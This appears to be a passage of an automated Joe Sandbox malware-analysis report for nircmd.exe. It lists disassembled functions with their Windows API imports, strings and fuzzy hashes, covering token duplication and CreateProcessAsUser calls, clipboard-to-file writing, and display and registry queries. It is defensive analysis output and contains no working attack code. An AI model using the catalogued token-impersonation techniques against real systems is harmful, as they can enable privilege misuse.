_strcmpi.MSVCRT ref: 00405F2B
_strcmpi.MSVCRT ref: 00405F5D
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F6E
_strcmpi.MSVCRT ref: 00405F7F
GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,0040547C,?,?,?,?,?,?,?,?,?), ref: 00405F90
_strcmpi.MSVCRT ref: 00405F9E

Part of subcall function 004028DE: GetModuleFileNameA.KERNEL32(00000000,?,00000104,004011D3,?,?,nircmd.exe), ref: 004028E9

strlen.MSVCRT ref: 00405FB0

Strings

windows, xrefs: 00405F79
system, xrefs: 00405F57
common_desktop, xrefs: 00405F23
nircmd, xrefs: 00405F98

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpi$Directory$FileModuleNameSystemWindowsstrlen
String ID: common_desktop$nircmd$system$windows
API String ID: 2486978100-2686657270
Opcode ID: 747c6446d4b2c1cebd3299d11d899ef7d53cdd2988406ff32c175a732552d525
Instruction ID: 5947eef841a5e8925d4be8e3b7c31605027da9b826bc5d0fb9f51de0496962b5
Opcode Fuzzy Hash: 747c6446d4b2c1cebd3299d11d899ef7d53cdd2988406ff32c175a732552d525
Instruction Fuzzy Hash: 9E119E3126CB476DFB1422312E06AEB4A98CF51729F21007BF101F90D2FABC94825A1E

Function 0040266F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00402688
??2@YAPAXI@Z.MSVCRT ref: 00402692
sprintf.MSVCRT ref: 004026D2
sprintf.MSVCRT ref: 00402700
memcpy.MSVCRT ref: 00402711
memset.MSVCRT ref: 0040273D
??3@YAXPAX@Z.MSVCRT ref: 004027A0
??3@YAXPAX@Z.MSVCRT ref: 004027A8

Strings

%8.8X , xrefs: 004026CC
%2.2X , xrefs: 004026F5

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ??2@??3@sprintf$memcpymemset
String ID: %2.2X $%8.8X
API String ID: 1143686992-259817711
Opcode ID: c468a52c06907f0afbf66440125d3eea1aa4e88bb4fc5f68323c813c2e0e206d
Instruction ID: 4d768b6b6e81dca40bb3363254cb90b05480aafa21f2031784f48b699a26a5d5
Opcode Fuzzy Hash: c468a52c06907f0afbf66440125d3eea1aa4e88bb4fc5f68323c813c2e0e206d
Instruction Fuzzy Hash: 9F41D672D04349AFDB10EFA5D985EDF77B8AF45314F10046BF801B72C2D6B9A99087A8

Function 00401269 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,004012BF,00000104,00404917,?,?,?,?), ref: 00401275
GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 0040128A
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00401296
GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004012A3
GetProcAddress.KERNEL32(00000000,CreateProcessAsUserA), ref: 004012B0

Strings

advapi32.dll, xrefs: 00401270
CreateProcessWithTokenW, xrefs: 00401281
DuplicateTokenEx, xrefs: 00401298
CreateProcessAsUserA, xrefs: 004012A5
OpenProcessToken, xrefs: 0040128C

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessAsUserA$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
API String ID: 2238633743-3283825160
Opcode ID: cb6503820662f63635737c408e418417153d96e438ec5df7082c301eceaf9fe3
Instruction ID: 8e3aa53b682d86820f5d0eade8699635e8bf9ffec988052a3a6b967c8f920fb2
Opcode Fuzzy Hash: cb6503820662f63635737c408e418417153d96e438ec5df7082c301eceaf9fe3
Instruction Fuzzy Hash: 7DF09E749407449BC7306F719909A47BEF5EB887007118E2EE59692660D7B89194CF14

Function 00407D34 Relevance: 16.6, APIs: 6, Strings: 5, Instructions: 136COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407D55
atoi.MSVCRT ref: 00407D72
_strcmpi.MSVCRT ref: 00407D95
_strcmpi.MSVCRT ref: 00407DAF
_strcmpi.MSVCRT ref: 00407DF9
CoInitialize.OLE32(00000000), ref: 00407E48

Strings

min, xrefs: 00407DA9
max, xrefs: 00407D88
/, xrefs: 00407DE4
Failed to create the shortcut !, xrefs: 00407EAF
common_desktop, xrefs: 00407DF3

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpi$Initializeatoimemset
String ID: /$Failed to create the shortcut !$common_desktop$max$min
API String ID: 3607272115-991234290
Opcode ID: d6b06a6848c1ce2c444c11b758981b0a8ffcc1ff64d184ef6d77849581fc770a
Instruction ID: 4218e0be564c759bf83c50324c907cf8d3c78bc49d63cf7ff5d68227ca9ba783
Opcode Fuzzy Hash: d6b06a6848c1ce2c444c11b758981b0a8ffcc1ff64d184ef6d77849581fc770a
Instruction Fuzzy Hash: 9741E7B2D04218ABE7209A55DC46BDB77ACAF40314F1440ABE918F71C1E778EB89CB95

Function 004037F3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 0040E631: ??3@YAXPAX@Z.MSVCRT ref: 0040E638

EnumDisplayMonitors.USER32(00000000,00000000,Function_00003782,?), ref: 00403810
memset.MSVCRT ref: 0040382F
memset.MSVCRT ref: 0040383D
EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 00403861
EnumDisplayDevicesA.USER32(?,00000000,?,00000000), ref: 00403880

Part of subcall function 004036F3: memset.MSVCRT ref: 00403718
Part of subcall function 004036F3: EnumDisplaySettingsA.USER32(?,?,?), ref: 00403734

Part of subcall function 004036F3: GetLastError.KERNEL32(?,?), ref: 00403773

_mbsicmp.MSVCRT ref: 004039A0
??3@YAXPAX@Z.MSVCRT ref: 00403A00
EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 00403A4D

Part of subcall function 00402269: malloc.MSVCRT ref: 00402285
Part of subcall function 00402269: memcpy.MSVCRT ref: 0040229D
Part of subcall function 00402269: ??3@YAXPAX@Z.MSVCRT ref: 004022A6

Strings

L, xrefs: 004039D2

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: DisplayEnum$??3@Devicesmemset$ErrorLastMonitorsSettings_mbsicmpmallocmemcpy
String ID: L
API String ID: 2903658310-2909332022
Opcode ID: c60c69b8f27440800f27c7082f7fd5e77fc616ed6f2f13017bcc7f2c11ade108
Instruction ID: 9c27dbe0daf64dd140cd48ab2047f80adb7cbb8650d39170bfa634fe6fa172a2
Opcode Fuzzy Hash: c60c69b8f27440800f27c7082f7fd5e77fc616ed6f2f13017bcc7f2c11ade108
Instruction Fuzzy Hash: E27108B2D00218AFDB20DF55DC80ADEBBB8FB08315F1085BAE519B7281D774AB858F54

Function 00406255 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 148processCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D92C: GetCurrentProcess.KERNEL32(?,00000000,?), ref: 0040D935
Part of subcall function 0040D92C: LoadLibraryA.KERNEL32(advapi32.dll,?,00000000,?), ref: 0040D944
Part of subcall function 0040D92C: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0040D956
Part of subcall function 0040D92C: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 0040D96C
Part of subcall function 0040D92C: GetLastError.KERNEL32(?,00000000,?), ref: 0040D976

Part of subcall function 00401337: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 00401342
Part of subcall function 00401337: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 00401356
Part of subcall function 00401337: GetModuleHandleA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId), ref: 00401365
Part of subcall function 00401337: GetProcAddress.KERNEL32(00000000), ref: 0040136C

FreeLibrary.KERNEL32(?), ref: 0040629F
memset.MSVCRT ref: 0040630D
GetLastError.KERNEL32(?,00000001,?), ref: 00406361
FreeLibrary.KERNEL32(?), ref: 00406372
memset.MSVCRT ref: 00406381
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000400,00000000,00000000,?,?), ref: 004063B1
GetLastError.KERNEL32 ref: 004063BB
FreeLibrary.KERNEL32(?), ref: 004063CC

Strings

SeTcbPrivilege, xrefs: 00406265

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Library$Free$AddressErrorLastProc$LoadProcessmemset$CreateCurrentHandleModule
String ID: SeTcbPrivilege
API String ID: 4182509570-1502394177
Opcode ID: 620ef7b188f2ca0eee884da0495f1f3e4d0a256d288b19548af8a40a9493bf2a
Instruction ID: 9daa2bc9eff459c8337e38c77d0624d85a8e4a3cac7da581018ae75e86d7491e
Opcode Fuzzy Hash: 620ef7b188f2ca0eee884da0495f1f3e4d0a256d288b19548af8a40a9493bf2a
Instruction Fuzzy Hash: 7F51D5B190024CAFDF10DFA5CD859EE7BA8BB08344F51443AFE16A2290D738DD55CB55

Function 00403390 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 90stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004033B2
_mbscpy.MSVCRT ref: 004033C1
strchr.MSVCRT ref: 004033E0
strlen.MSVCRT ref: 004033F6
strlen.MSVCRT ref: 00403404
_mbscat.MSVCRT ref: 0040343E
_mbscpy.MSVCRT ref: 00403464

Strings

.lnk, xrefs: 00403438
<>:"/\|, xrefs: 004033DB

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _mbscpystrlen$_mbscatmemsetstrchr
String ID: .lnk$<>:"/\|
API String ID: 1872820629-1888144795
Opcode ID: cb084710c470074afeffb608f3317f87414e009bcb5e454975b98be3e955be07
Instruction ID: 2f91d3a8cc207012c0af06d0eedb5f106dc3c31a4db85c1f9429671d9a1579a9
Opcode Fuzzy Hash: cb084710c470074afeffb608f3317f87414e009bcb5e454975b98be3e955be07
Instruction Fuzzy Hash: CB31A77280421DAEDF129F50DC85DDA7B6CEF14315F1000ABF944A6091EAB99FD58F98

Function 004107F3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 70registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410814
RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Multimedia\Sound Mapper,00000000,00020019,?), ref: 00410830
RegCloseKey.ADVAPI32(?), ref: 00410856
waveOutGetNumDevs.WINMM ref: 00410867
memset.MSVCRT ref: 0041087A
waveOutGetDevCapsA.WINMM(00000000,?,00000034), ref: 00410886
_strcmpi.MSVCRT ref: 0041089B

Part of subcall function 0040E8FD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?,0040CCF2,?,?,?), ref: 0040E918

Strings

Playback, xrefs: 00410841
Software\Microsoft\Multimedia\Sound Mapper, xrefs: 00410826

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: memsetwave$CapsCloseDevsOpenQueryValue_strcmpi
String ID: Playback$Software\Microsoft\Multimedia\Sound Mapper
API String ID: 2430942901-2460313733
Opcode ID: a965f1a33e828a392d89d92f9d736537487115c1b896888affbead4bf9ea8747
Instruction ID: ac484586679ba834272b1b6fd8eb699e902f73b4a2f6ffc3aa52bf72ddeb07ec
Opcode Fuzzy Hash: a965f1a33e828a392d89d92f9d736537487115c1b896888affbead4bf9ea8747
Instruction Fuzzy Hash: C3110BF1A04208AFF711AB619D81FEB77ACAF44344F10007AF649E2552E3F89EC49698

Function 0040DC6C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 0040DC85
memset.MSVCRT ref: 0040DCC3
GetWindowsDirectoryA.KERNEL32(00416960,00000104,?,00000000,00000000), ref: 0040DCDB
_mbscpy.MSVCRT ref: 0040DCEE
_mbscpy.MSVCRT ref: 0040DCFD
_mbscat.MSVCRT ref: 0040DD0D
_mbscpy.MSVCRT ref: 0040DD1D

Strings

\systemroot, xrefs: 0040DC97
`iA, xrefs: 0040DCD2

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _mbscpy$DirectoryWindows_mbscatmemsetstrchr
String ID: \systemroot$`iA
API String ID: 31225409-2214950577
Opcode ID: aa56806e77d3b6df0e3125594558de194b2e5426a917646e65390bb50b0ffab1
Instruction ID: e0ca7cd843fdb7f209439989472fbcd147738b1dcf767aea4e7b4a175c23940d
Opcode Fuzzy Hash: aa56806e77d3b6df0e3125594558de194b2e5426a917646e65390bb50b0ffab1
Instruction Fuzzy Hash: CE11E6B59042087AFB10AB95DC41FDA3BACDF18348F10406BF449A2192D7B8DAC88B99

Function 0040D92C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 52libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?), ref: 0040D935
LoadLibraryA.KERNEL32(advapi32.dll,?,00000000,?), ref: 0040D944
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0040D956
FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 0040D96C
GetLastError.KERNEL32(?,00000000,?), ref: 0040D976
GetLastError.KERNEL32(?,?,00000000,?), ref: 0040D9A7
CloseHandle.KERNEL32(?,?,?,00000000,?), ref: 0040D9B2

Strings

advapi32.dll, xrefs: 0040D93B
OpenProcessToken, xrefs: 0040D950

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ErrorLastLibrary$AddressCloseCurrentFreeHandleLoadProcProcess
String ID: OpenProcessToken$advapi32.dll
API String ID: 1272396852-358123303
Opcode ID: 468ab1f40062e446c86e51308073e0404f006b121ed6c2928513a95c3b057816
Instruction ID: 1375e2997d7b205251fe17e056bfdc42f4edd618f149c0a8aa52b8e44798b992
Opcode Fuzzy Hash: 468ab1f40062e446c86e51308073e0404f006b121ed6c2928513a95c3b057816
Instruction Fuzzy Hash: EB01D672E00104ABD701ABE0CD49AEE7BB8EF08340F118036FB01F2260EB788E449769

Function 00402BDE Relevance: 15.1, APIs: 10, Instructions: 82fileclipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32(0000000D), ref: 00402BEB
GlobalFix.KERNEL32(00000000), ref: 00402BFE
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 00402C23
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00402C30
GetFileSize.KERNEL32(00000000,00000000), ref: 00402C45
wcslen.MSVCRT ref: 00402C6A
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402C75
CloseHandle.KERNEL32(00000000), ref: 00402C91
GlobalUnWire.KERNEL32(?), ref: 00402CA1
CloseClipboard.USER32 ref: 00402CA9

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: File$ClipboardCloseGlobal$CreateDataHandlePointerSizeWireWritewcslen
String ID:
API String ID: 1746662600-0
Opcode ID: 93bcda7092c4bfdc4dc742b2051549645153115191e6af116e4ee58835ec25c8
Instruction ID: 20cd47f9b7f55b5c20f271b356cfeaaa962f25850266008a81d5ad0ace6d19e5
Opcode Fuzzy Hash: 93bcda7092c4bfdc4dc742b2051549645153115191e6af116e4ee58835ec25c8
Instruction Fuzzy Hash: 48219271500214BBE7201B21DE4EEEF7E6CEB49B65F108026FA05F11E0D7B84D419A68

Function 00406124 Relevance: 15.0, APIs: 5, Strings: 5, Instructions: 47COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 0040612A
_strcmpi.MSVCRT ref: 0040613F

Strings

belownormal, xrefs: 00406139
low, xrefs: 00406124
high, xrefs: 00406167
realtime, xrefs: 0040617E
abovenormal, xrefs: 00406150

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpi
String ID: abovenormal$belownormal$high$low$realtime
API String ID: 1439213657-3828265770
Opcode ID: e718dd134d459b6082763e59acca76a6cffc7f2dbd1dd6810e707b04723562fc
Instruction ID: 674ba5faec637a3ce598ef464c762c0228810fb746cc7e28ad6cf7eac0e65f56
Opcode Fuzzy Hash: e718dd134d459b6082763e59acca76a6cffc7f2dbd1dd6810e707b04723562fc
Instruction Fuzzy Hash: FEF0827639861415FA1921796E03BCB4288DF51B2AFB0112FF600E42C7FECC85E1419C

Function 00408376 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 107threadCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00408381
_strcmpi.MSVCRT ref: 00408390
_strcmpi.MSVCRT ref: 004083E1
_strcmpi.MSVCRT ref: 004083F5
GetForegroundWindow.USER32 ref: 0040840B
GetWindowThreadProcessId.USER32(00000000,?), ref: 0040841A

Part of subcall function 0040299D: memset.MSVCRT ref: 004029D3
Part of subcall function 0040299D: strtol.MSVCRT ref: 004029FC

Strings

systemsounds, xrefs: 004083ED
focused, xrefs: 004083D9

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpi$Window$ForegroundInitializeProcessThreadmemsetstrtol
String ID: focused$systemsounds
API String ID: 3889057988-605464368
Opcode ID: 5e25f7bff4daa82e72c13680cf3d72f8df3992e822f389e435b973a561145ddf
Instruction ID: 718d9d13023635ae923e609934f6f5eb049323e125bcab12a04cfb0ae0ea4c83
Opcode Fuzzy Hash: 5e25f7bff4daa82e72c13680cf3d72f8df3992e822f389e435b973a561145ddf
Instruction Fuzzy Hash: 8131C8321042067FDF106FA19D459AF3B58AF44334B11863FFAA4E21D2DE798891475D

Function 00403A9F Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70stringCOMMON

Download Yara Rule

APIs

_mbsicmp.MSVCRT ref: 00403AB0
memset.MSVCRT ref: 00403AE0
strlen.MSVCRT ref: 00403AE8
_snprintf.MSVCRT ref: 00403B05
_mbsicmp.MSVCRT ref: 00403B32
_mbsicmp.MSVCRT ref: 00403B44

Strings

Primary, xrefs: 00403AA8
\\.\DISPLAY%s, xrefs: 00403AFE

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _mbsicmp$_snprintfmemsetstrlen
String ID: Primary$\\.\DISPLAY%s
API String ID: 3375939262-3630482177
Opcode ID: 66470bbfcd89d31ac7c4848213a8987f17d3f2886babfaced8daa39f9b783f99
Instruction ID: 4c89ad1791d8848607721a74d4bfb9fd7db72191b3e393dbcefcb0e0882c714a
Opcode Fuzzy Hash: 66470bbfcd89d31ac7c4848213a8987f17d3f2886babfaced8daa39f9b783f99
Instruction Fuzzy Hash: DF11DA725041195AEF21AE658C01FDB3FACAF44349F14047BF944E2183E678EBC18698

Function 0040354A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040356C
strlen.MSVCRT ref: 00403580
strchr.MSVCRT ref: 004035B0
_mbscpy.MSVCRT ref: 004035DC
_mbscat.MSVCRT ref: 004035EE
_mbscat.MSVCRT ref: 004035F9

Strings

.url, xrefs: 004035F3
\/:*?"<>|, xrefs: 00403574

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _mbscat$_mbscpymemsetstrchrstrlen
String ID: .url$\/:*?"<>|
API String ID: 2621195719-2798604190
Opcode ID: 20db0751c4a48d2c3026c6140f889975b7c481aabe7e44d497bb30bfe8b06b46
Instruction ID: 4a86d97863847695a53df0ad62104f81f5034ce80ed42e7eb1d82793896fd332
Opcode Fuzzy Hash: 20db0751c4a48d2c3026c6140f889975b7c481aabe7e44d497bb30bfe8b06b46
Instruction Fuzzy Hash: C6110A7241411CBEDB11AEA98C42AEEBBBC9F01308F5404ABED54B7242D6B85BC587F5

Function 004020EF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00402114
FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00402132
strlen.MSVCRT ref: 0040213F
_mbscpy.MSVCRT ref: 0040214F
LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00402159
_mbscpy.MSVCRT ref: 00402169

Strings

netmsg.dll, xrefs: 0040210F
Unknown Error, xrefs: 00402161

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
String ID: Unknown Error$netmsg.dll
